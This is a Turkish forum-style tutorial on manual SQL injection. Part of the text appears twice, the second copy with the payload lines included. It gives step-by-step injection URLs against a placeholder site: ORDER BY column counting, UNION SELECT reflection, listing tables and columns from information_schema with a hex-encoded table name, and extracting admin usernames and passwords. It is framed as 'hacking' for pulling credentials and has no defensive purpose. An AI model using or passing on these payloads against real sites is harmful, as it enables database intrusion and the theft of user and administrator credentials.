Evet arkadaşlar bu yazıda sizlere sql manuel inj hack yapımını anlatıcam.
İlk olarak sitenin kolon sayısını bulmamız lazım bunu
komutu ile yapıcaz mesela örnek olarak :
yazdık hata vermedi o zaman hata alana kadar 1 sayısını arttırıcaz
böle gidicek ya da 1 yazınca hata verdi diyelim o zaman hata almamaya çalışıcaz.
Şimdi site de id pass çekebilmek için en önemli şey kolon sayıların yansımasıdır.
Bunu:
komutu ile yapıyoruz.
Şimdi örnek olarak sitemizin kolon sayısı 5 olsun diyelim şöyle yapıyoruz.
fark ettiyseniz - koydum çünki verilerin ekrana yansıması için bunu koymamız lazım
neden 4 de kadar yaptım çünki 0 dan başladım.
Şimdi kolon sayıları 2 ve 3 olarak yansıdı diyelim burada istediginiz rakamı kullanıcaz ben 2 seçiyorum
şeklinde aratıyoruz.Bu komut databasedeki tablo adlarını çekmeye işe yarıyor.
Evet ekrana tablo adları yansıdı şimdi kolon adlarını bulalım(bu arada tablo adları admin members
users user gibi olanları kullanıyoruz bizimki admin çıktı diyelim)
Şimdi bize kolon adlarını çekmek için tablo adını hex koduna çevirmemiz lazım bunu site yardımı ile yapabiliriz site: Hex/Ascii Converter
Şimdi Yazacagımız kod:
burada table_name den sonra hex kodunu yazıcaz table_name=0x5612312 gibi sitede
çevirdiğiniz hex kodu 54:65:89:15 şeklinde çıkabilir noktaları silioruz
Evet ekrana kolon isimleri de yansıdı bu isimler username uname usname pass password gibi olabilir bizde name ve pass olarak çıktı farzedelim şöyle yapıyoruz
yardımcı olduysam ne mutlu bana...
eğer sorun olursa özel mesaj atabilirsiniz
İlk olarak sitenin kolon sayısını bulmamız lazım bunu
Kod:
order+by
Kod:
www.siteadi.com/index.php?id=65+order+by+1
Kod:
www.siteadi.com/index.php?id=65+order+by+2
www.siteadi.com/index.php?id=65+order+by+3Şimdi site de id pass çekebilmek için en önemli şey kolon sayıların yansımasıdır.
Bunu:
Kod:
union+selectŞimdi örnek olarak sitemizin kolon sayısı 5 olsun diyelim şöyle yapıyoruz.
Kod:
www.siteadi.com/index.php?id=-65+union+select+0,1,2,3,4neden 4 de kadar yaptım çünki 0 dan başladım.
Şimdi kolon sayıları 2 ve 3 olarak yansıdı diyelim burada istediginiz rakamı kullanıcaz ben 2 seçiyorum
Kod:
www.siteadi.com/index.php?id=-65+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()Evet ekrana tablo adları yansıdı şimdi kolon adlarını bulalım(bu arada tablo adları admin members
users user gibi olanları kullanıyoruz bizimki admin çıktı diyelim)
Şimdi bize kolon adlarını çekmek için tablo adını hex koduna çevirmemiz lazım bunu site yardımı ile yapabiliriz site: Hex/Ascii Converter
Şimdi Yazacagımız kod:
Kod:
www.siteadi.com/index.php?id=-65+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexkoduçevirdiğiniz hex kodu 54:65:89:15 şeklinde çıkabilir noktaları silioruz
Evet ekrana kolon isimleri de yansıdı bu isimler username uname usname pass password gibi olabilir bizde name ve pass olarak çıktı farzedelim şöyle yapıyoruz
Kod:
www.siteadi.com/index.php?id=-65+union+select+0,1,kolon adi,kolon adi,4+from+tablo adi
yani şöyle www.siteadi.com/index.php?id=-65+union+select+0,1,name,pass,4+from+admineğer sorun olursa özel mesaj atabilirsiniz
